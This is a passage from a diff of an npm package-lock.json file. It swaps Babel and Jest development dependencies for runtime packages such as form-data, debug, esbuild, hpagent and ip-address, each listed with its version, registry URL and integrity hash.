"sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, + "node_modules/clone-regexp": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/clone-regexp/-/clone-regexp-3.0.0.tgz", + "integrity": "sha512-ujdnoq2Kxb8s3ItNBtnYeXdm07FcU0u8ARAT1lQ2YdMwQC+cdiXX8KoqMVuglztILivceTtp4ivqGSmEmhBUJw==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "is-regexp": "^3.0.0" }, "engines": { - "node": ">=6.9.0" + "node": ">=12" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" + "delayed-stream": "~1.0.0" }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": ">= 0.8" } }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, + "node_modules/convert-hrtime": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/convert-hrtime/-/convert-hrtime-5.0.0.tgz", + "integrity": "sha512-lOETlkIeYSJWcbbcvjRKGxVMXJR+8+OQb/mTPbA4ObPMytYIsUbuOE0Jzy60hjARYszq1id0j8KgVhC+WGZVTg==", + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, + "node_modules/debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", + "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" + "ms": "^2.1.3" }, "engines": { - "node": ">=6.9.0" + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=0.4.0" } }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "license": "MIT", "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" }, "engines": { - "node": ">=8" + "node": ">= 0.4" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "license": "MIT", "dependencies": { - "sprintf-js": "~1.0.2" + "once": "^1.4.0" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "license": "MIT", + "engines": { + "node": ">= 0.4" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "license": "MIT", "engines": { - "node": ">=8" + "node": ">= 0.4" } }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "license": "MIT", "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" + "es-errors": "^1.3.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "license": "MIT", "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } + "node": ">= 0.4" } }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", + "node_modules/esbuild": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.5.tgz", + "integrity": "sha512-P8OtKZRv/5J5hhz0cUAdu/cLuPIKXpQl1R9pZtvmHWQvrAUVd0UNIPT4IB4W3rNOqVO0rlqHmCIbSwxh/c9yUQ==", "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.25.5", + "@esbuild/android-arm": "0.25.5", + "@esbuild/android-arm64": "0.25.5", + "@esbuild/android-x64": "0.25.5", + "@esbuild/darwin-arm64": "0.25.5", + "@esbuild/darwin-x64": "0.25.5", + "@esbuild/freebsd-arm64": "0.25.5", + "@esbuild/freebsd-x64": "0.25.5", + "@esbuild/linux-arm": "0.25.5", + "@esbuild/linux-arm64": "0.25.5", + "@esbuild/linux-ia32": "0.25.5", + "@esbuild/linux-loong64": "0.25.5", + "@esbuild/linux-mips64el": "0.25.5", + "@esbuild/linux-ppc64": "0.25.5", + "@esbuild/linux-riscv64": "0.25.5", + "@esbuild/linux-s390x": "0.25.5", + "@esbuild/linux-x64": "0.25.5", + "@esbuild/netbsd-arm64": "0.25.5", + "@esbuild/netbsd-x64": "0.25.5", + "@esbuild/openbsd-arm64": "0.25.5", + "@esbuild/openbsd-x64": "0.25.5", + "@esbuild/sunos-x64": "0.25.5", + "@esbuild/win32-arm64": "0.25.5", + "@esbuild/win32-ia32": "0.25.5", + "@esbuild/win32-x64": "0.25.5" } }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, + "node_modules/escape-string-regexp": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-5.0.0.tgz", + "integrity": "sha512-/veY75JbMK4j1yjvuUxuVsiS/hr/4iHs9FTT6cgTexxdE0Ly/glccBAkloH/DofkjRbZU3bnoj38mOmhkZ0lHw==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", + "license": "MIT" + }, + "node_modules/form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", + "license": "MIT", "dependencies": { - "jest-get-type": "^29.4.3" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 6" } }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, + "node_modules/function-timeout": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/function-timeout/-/function-timeout-0.1.1.tgz", + "integrity": "sha512-0NVVC0TaP7dSTvn1yMiy6d6Q8gifzbvQafO46RtLG/kHJUBNd+pVRGOBoK44wNBvtSPUJRfdVvkFdD3p0xvyZg==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" + "node": ">= 0.4" }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "license": "MIT", "dependencies": { - "@sinclair/typebox": "^0.27.8" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "license": "MIT", + "engines": { + "node": ">= 0.4" }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" + "has-symbols": "^1.0.3" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "license": "MIT", "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" + "function-bind": "^1.1.2" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14" } }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, + "node_modules/ip-address": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-10.0.1.tgz", + "integrity": "sha512-NWv9YLW4PoW2B7xtzaS3NCot75m6nK7Icdv0o3lfMceJVRfSoQwqD4wEH5rLwoKJwUiZ/rfpiVBhnaF0FK4HoA==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 12" } }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, + "node_modules/ip-regex": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-5.0.0.tgz", + "integrity": "sha512-fOCG6lhoKKakwv+C6KdsOnGvgXnmgfmp0myi3bcNwj3qfwPAxRKWEuFhvEFF7ceYIz6+1jRZ+yguLFAmUNPEfw==", + "license": "MIT", + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-ip": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-5.0.1.tgz", + "integrity": "sha512-FCsGHdlrOnZQcp0+XT5a+pYowf33itBalCl+7ovNXC/7o5BhIpG14M3OrpPPdBSIQJCm+0M5+9mO7S9VVTTCFw==", + "license": "MIT", "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" + "ip-regex": "^5.0.0", + "super-regex": "^0.2.0" }, "engines": { - "node": ">=6.0.0" + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@jridgewell/resolve-uri": { + "node_modules/is-regexp": { "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, + "resolved": "https://registry.npmjs.org/is-regexp/-/is-regexp-3.1.0.tgz", + "integrity": "sha512-rbku49cWloU5bSMI+zaRaXdQHXnthP6DZ/vLnfdSKyL4zUzuWnomtOEiZZOd+ioQ+avFo/qau3KPTc7Fjy1uPA==", + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": 